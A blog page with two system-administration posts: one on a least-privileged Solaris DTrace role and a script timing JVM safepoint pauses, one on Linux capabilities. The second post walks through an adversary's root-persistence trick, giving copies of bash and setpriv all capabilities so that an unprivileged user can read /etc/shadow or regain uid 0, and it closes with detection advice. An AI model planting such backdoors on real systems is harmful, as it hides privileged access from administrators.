Search This Blog

Showing posts with label solaris privileges. Show all posts
Showing posts with label solaris privileges. Show all posts

Thursday, 2 June 2016

Working round problems with DTrace



In this article I'm going to introduce an awesome bit of technology developed by Sun Microsystems (now part of Oracle), called DTrace. Adding to the mix I'll look at setting up a privileged role to perform DTrace operations.

DTrace allows you to instrument any part of the system from internal kernel functions, through syscalls, then into the userland processes (all in the *same* script). In short, if you wish to diagnose a performance issue, this is the tool to use. Not only that, but the probes have zero impact if you do not use them, and virtually no impact (very low latency) when you do use them.

Thinks of it as low impact and simplified kernel debugging; without debug traps and associated race conditions (remember truss and tracing the X server!)

We also have destructive DTrace, which allows you (with restrictions) to modify stuff.

Just as with many tools, it can also be used for other things. It is a awesome tool for reverse engineering (you can monitor live systems in real time) and for evil (it is just as easy to sniff for credentials, for example; and as a part of the OS it can be “below the radar”).

You can find information on DTrace on Oracle's website e.g. the user guide http://docs.oracle.com/cd/E19253-01/819-5488/ and the reference http://docs.oracle.com/cd/E19253-01/817-6223/ .

If you wish to delve deeper, I would recommend Brendan Gregg's website http://www.brendangregg.com and his DTrace books.

Once we have set up the role I'll go through how I solved a problem I was having by using DTrace. There was a Java application that was supplied and maintained by a vendor which runs on a box we maintain. Unfortunately there were problems, and as part of my diagnostics I wanted to enable verbose GC logging to see if there was a problem in this area.

Due to the politics of the situation, I wasn't permitted to modify the application or use 'application tools' like jstat, and the vendor wouldn't agree to do it either at that time. I was permitted to use OS tools; and DTrace was an OS tool... so that was my way in.

Setting up a role

There are a few ways you can use DTrace. The easiest is to run it as root. However, as we are security concious we want least-privileged setups.

You can also assign certain DTrace privileges to other users. However, you may not want a user that can log in remotely to have default privileged access.

Finally, you can create a role. In this case, you may need to consider other factors (giving a user privileges over other users, for example), but a role cannot log in remotely ..... basically risk-assess your situation and decide.

So, lets create a role.

root@sol10-u9-t4# roleadd -m -K defaultpriv=basic,priv_dtrace_proc,dtrace_user,dtrace_kernel,priv_proc_owner -d /export/home/dbguser dbguser
64 blocks
root@sol10-u9-t4# rolemod -s /bin/bash dbguser

There appears to be a bug in Solaris (the version I'm using) in that in order to use the tick probe (in the profile provider), you also need the dtrace_kernel privilege for the probe to fire. As we are tracing other users we also need priv_proc_owner. Note that you can only trace owners that don't have more privileges than you; see the man page privileges(5).

Lets allow a normal user to access that role:

root@sol10-u9-t4# usermod -K roles=dbguser paul

If another user attempts to su to that role it will fail:

joe@sol10-u9-t4$ su - dbguser
Password:
Roles can only be assumed by authorized users
su: Sorry

But we can access it:

paul@sol10-u9-t4$ su - dbguser
Password:
Oracle Corporation      SunOS 5.10      Generic Patch   January 2005
dbguser@sol10-u9-t4$ ppriv $$
3974:   -bash
flags = <none>
        E: basic,dtrace_kernel,dtrace_proc,dtrace_user,proc_owner
        I: basic,dtrace_kernel,dtrace_proc,dtrace_user,proc_owner
        P: basic,dtrace_kernel,dtrace_proc,dtrace_user,proc_owner
        L: all

Solving my problem

I needed to find evidence to prove whether or not various areas could be the cause of some problems in a live environment. One area of interest was the Java JVM, which was running on Solaris 10.

A bit of background to Java JVM's. One thing that surprisingly few people fully appreciate is that a Java application will regularly freeze (halt). It is part of the design. This is done by the VM Thread and is colloquially known as a stop-the-world (STW) event, and are usually very short in duration. Technically it is known as a safepoint, and is only initiated within the VM Thread.

One of the main users of this are the Java garbage collectors (GC). For example, the CMS collector will freeze the JVM during the initial-mark and the remark phases. So, if the JVM isn't tuned well, or is having memory or demand issues, this can cause longer and/or more frequent GC events, and thus more time spent frozen and less time doing productive work; this can cascade into complete failure of the app in serious situations.

Within DTrace we have a number of providers. There are two that perform function boundary tracing, fbt for kernel functions (this one is really fun to play with) and the pid provider for userland functions. There are many other providers, such as syscall, io, sched, etc.

Secondly, if we look at the OpenJDK source code (e.g. https://java.net/projects/openjdk6/downloads/), we see a couple of interesting functions:

RuntimeService::record_safepoint_begin()
RuntimeService::record_safepoint_end()

The key files you will want to see, if you wish to examine it further, are:

hotspot/src/share/vm/runtime/safepoint.cpp
hotspot/src/share/vm/runtime/vmthread.cpp
hotspot/src/share/vm/services/runtimeService.cpp

Now, on the (closed-source) JVM we can have a look at the symbols via nm. We see that the closed-source version also has these functions. You can use other techniques to verify the functionality if you wish.

paul@sol10-u9-t4$ /usr/ccs/bin/nm -p libjvm.so | fgrep record_safepoint
0001366368 t __1cORuntimeServicebDrecord_safepoint_synchronized6F_v_
0001369140 t __1cORuntimeServiceUrecord_safepoint_end6F_v_
0001366776 t __1cORuntimeServiceWrecord_safepoint_begin6F_v_

So, let's start writing the DTrace script.

Within DTrace there are a load of ways we can handle this, but lets just look at summing the time we are in a safepoint over a defined interval.

We create an empty text document (say sumstw.d) with the following header:

#!/usr/sbin/dtrace -Cs

#pragma D option quiet

We then add our two probes. The first triggers on the return of the function call, storing the timestamp (in nanoseconds) in the thread local variable ts. $1 is the argument to the trace script and will be the PID.

pid$1:libjvm:__1cORuntimeServiceWrecord_safepoint_begin6F_v_:return
{
        self->ts = timestamp;
}

The second is triggered on entry into the function call. It is an aggregation (sum) of the difference in the timestamps. i.e. how long we were in a STW event. You can also create frequency distributions using, for example, quantize().

pid$1:libjvm:__1cORuntimeServiceUrecord_safepoint_end6F_v_:entry
/self->ts/
{
        @total = sum(timestamp - self->ts);
        self->ts = 0;
}

Finally, we use the tick probe to trigger every specified unit of time. In this case every second.

tick-1sec
{
        printf("Time: %Y", walltimestamp );
        printa(@total);
        clear(@total);
}

And that's it.

I have written a simple Java program that just creates and destroys Java objects (forgetting to do a few; i.e. memory leak) so as to exercise the GC code. If I run it and then compare with the output from a verbose GC log I can see it all appears to match. NOTE: other things cause STW events so it will not always match, but in this sense the DTrace is better, as I'm looking for all times when the JVM is frozen.

So run the JVM first to get the PID:

paul@sol10-u9-t4$
java -verbosegc -server \
        -XX:+UseParNewGC -XX:+UseConcMarkSweepGC \
        -Xms32m -Xmx32m \
        -XX:+PrintGCDetails -XX:+PrintGCDateStamps \
        testRig

Start the DTrace script, the numbers are in nanoseconds.

./traceSTW-sum.d `pgrep -u paul java`
Time: 2016 May 11 04:49:39
                0
Time: 2016 May 11 04:49:40
         22953072
Time: 2016 May 11 04:49:41
         36557806
Time: 2016 May 11 04:49:42
                0

Comparing we see:

2016-05-11T04:49:38.560+0100: [CMS-concurrent-reset: 0.000/0.000 secs] [Times: user=0.00 sys=0.00, real=0.00 secs]
2016-05-11T04:49:40.570+0100: [GC [1 CMS-initial-mark: 7258K(16384K)] 22042K(31168K), 0.0227668 secs] [Times: user=0.02 sys=0.00, real=0.02 secs]
2016-05-11T04:49:40.598+0100: [CMS-concurrent-mark: 0.006/0.006 secs] [Times: user=0.01 sys=0.00, real=0.01 secs]
2016-05-11T04:49:40.599+0100: [CMS-concurrent-preclean: 0.000/0.000 secs] [Times: user=0.00 sys=0.00, real=0.00 secs]
2016-05-11T04:49:41.547+0100: [GC [ParNew: 14784K->1600K(14784K), 0.0193115 secs] 22042K->10379K(31168K), 0.0193506 secs] [Times: user=0.03 sys=0.00, real=0.02 secs]
2016-05-11T04:49:41.573+0100: [CMS-concurrent-abortable-preclean: 0.045/0.974 secs] [Times: user=0.08 sys=0.00, real=0.97 secs]
2016-05-11T04:49:41.573+0100: [GC[YG occupancy: 9174 K (14784 K)][Rescan (parallel) , 0.0167713 secs][weak refs processing, 0.0000035 secs] [1 CMS-remark: 8779K(16384K)] 17953K(31168K), 0.0168503 secs] [Times: user=0.02 sys=0.00, real=0.02 secs]
2016-05-11T04:49:41.598+0100: [CMS-concurrent-sweep: 0.008/0.008 secs] [Times: user=0.00 sys=0.00, real=0.01 secs]
2016-05-11T04:49:41.599+0100: [CMS-concurrent-reset: 0.000/0.000 secs] [Times: user=0.00 sys=0.00, real=0.00 secs]

As you can see, via DTrace we are now tracking what we want to. So, we can go to the live system, and without enabling verbose GC logging or any application tool, we can trace all the events of interest.

This is the tip of the iceberg when it comes to DTrace. The stuff you can do with this is truly awesome. Enjoy.

Monday, 2 May 2016

Linux Capabilities - A friend and foe



As an infrastructure engineer (3rd line support) with a healthy interest in security I like to discover and play with the less well known features of technology. It is surprising how many people are not aware of these, even some senior administrators, yet such features can offer both strong mechanisms to improve the security of a system and strong mechanism for a more nefarious individual to compromise or otherwise abuse that system.

One of these are Linux Capabilities, which can be thought of a division of root's capabilities into discrete parts, such as the ability to open a privileged port or bypass discretionary access controls. This allows for a more fine-grained approach to security. Rather than a user or process having root privileges or not, they can have a subset.

If the process is "capabilities aware", then rather than the traditional "become_root" and "unbecome_root" functions that a SUID root process may use to protect itself, it can enable/disable the specific bits it needs. For example, if you only want to open a privileged port, you don't need to enable the ability to read/write any file.

Solaris has something similar - Privileges - but here I'm going to concentrate on the Linux variant.

Processes and files can have a number of "capability sets". These are bitmasks of the discrete capabilities. Of particular interest are:

Permitted - this is the set of capabilities that the process or file can assume
Effective - this is the set of capabilities that the process or file has
Inheritable - this is the set of capabilities that are preserved across an exec or fork e.g. that can be passed on to a sub-process.

The possible configurations are quite extensive, so reading the man page is encouraged. But let's look at some examples.

First, the classic example; ping. On older distributions this was SUID root to allow it to open raw sockets. However, on CentOS 7.1 for example, it isn't. Instead we now use capabilities:

[root@centos7-1 ~]# ls -l /bin/ping
-rwxr-xr-x. 1 root root 44896 Jun 23  2015 /bin/ping
[root@centos7-1 ~]# getcap /bin/ping
/bin/ping = cap_net_admin,cap_net_raw+p

In addition to 'getcap', we can also view the capabilities of a process in a number of ways, such as using the proc filesystem:

[root@centos7-1 ~]# grep ^Cap /proc/$$/status
CapInh:     0000000000000000
CapPrm:     0000001fffffffff
CapEff:     0000001fffffffff
CapBnd:     0000001fffffffff

Or 'getpcaps' to give a more friendly output:

[root@centos7-1 ~]# getpcaps $$
Capabilities for `3506': = cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_linux_immutable,cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw,cap_ipc_lock,cap_ipc_owner,cap_sys_module,cap_sys_rawio,cap_sys_chroot,cap_sys_ptrace,cap_sys_pacct,cap_sys_admin,cap_sys_boot,cap_sys_nice,cap_sys_resource,cap_sys_time,cap_sys_tty_config,cap_mknod,cap_lease,cap_audit_write,cap_audit_control,cap_setfcap,cap_mac_override,cap_mac_admin,cap_syslog,35,36+ep

However, as you probably noticed when we listed the 'ping' executable, other than the colour (if use are using ls with colours set), there are no obvious signs that it is a privileged file. Indeed, the traditional 'find' for SUID/SGID files won't show this up. So, unless you are looking for them, these are good places to hide.

So, if an adversary has root and wishes to maintain privileged access, but stay off the radar, they may try a capabilities enabled shell:

[root@centos7-1 mnt]# cp -p /bin/bash /mnt/myBash
[root@centos7-1 mnt]# setcap all+epi /mnt/myBash
[root@centos7-1 mnt]# getcap /mnt/myBash
/mnt/myBash =eip

Then as a non-privileged user we can try this:

[paul@centos7-1 ~]$ /mnt/myBash
[paul@centos7-1 ~]$ wc -l /etc/shadow
wc: /etc/shadow: Permission denied

That is because the processes initial inheritable set (the non-privileged user) is empty and on an exec it is and'ed with the inheritable set of the file. But this is easy to work around; we just get myBash to open the file and hand over the contents to the child:

[paul@centos7-1 ~]$ grep ^Cap /proc/$$/status
CapInh:     0000000000000000
CapPrm:     0000001fffffffff
CapEff:     0000001fffffffff
CapBnd:     0000001fffffffff
[paul@centos7-1 ~]$ wc -l < /etc/shadow
20

But, as an adversary, I feel we can do better. Luckily, rather than rolling our own program to make the relevant system calls to the kernel, we also have a program called setpriv. This unprivileged executable allows a privileged caller to set the inheritable capability set of a process and its uid/gid. So, if we were to create our own privileged copy:

[root@centos7-1 mnt]# cp -p /bin/setpriv /mnt/mySetpriv
[root@centos7-1 mnt]# setcap all+epi /mnt/mySetpriv
[root@centos7-1 mnt]# getcap /mnt/mySetpriv
/mnt/mySetpriv =eip

And then use it as an unprivileged user:

[paul@centos7-1 ~]$ echo $0
-bash
[paul@centos7-1 ~]$ /mnt/mySetpriv --inh-caps +all --reuid 0 /bin/bash
[root@centos7-1 ~]# id -a
uid=0(root) gid=1000(paul) groups=0(root),10(wheel),1000(paul) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023

Success. The problem is that this shows up as root:

[root@centos7-1 ~]# ps -fp $$
UID         PID   PPID  C STIME TTY          TIME CMD
root       3693   3455  0 09:17 pts/0    00:00:00 /bin/bash

Instead, let's combine the inheritable set for the process with the privileged shell:

[paul@centos7-1 ~]$ /mnt/mySetpriv --inh-caps +all /mnt/myBash
[paul@centos7-1 ~]$ wc -l /etc/shadow
wc: /etc/shadow: Permission denied

Well that didn't work; but as we are in a capabilities environment, our capabilities are determined by the relationship between the process and files capabilities. This time we lost the permitted set:

[paul@centos7-1 ~]$ /bin/bash
[paul@centos7-1 ~]$ grep ^Cap /proc/$/status
CapInh: 0000001fffffffff
CapPrm: 0000000000000000
CapEff: 0000000000000000
CapBnd: 0000001fffffffff

But then there are a multitude of ways we can play with this; just limited to your imagination. e.g. short "one-off" commands via mySetperm will probably get missed by an admin running 'ps'.

Fortunately, one good countermeasure is that setting a filesystem as "nosuid" also disables files from taking on capabilities. But if an adversary is using it to maintain access, then any writable "suid" permitted filesystem will do.

The key is that 'find' SUID won't work, you need to be looking for these privileged files as well.

Finally, if you are looking at assigning users restricted capabilities, you may find pam_setcap of interest.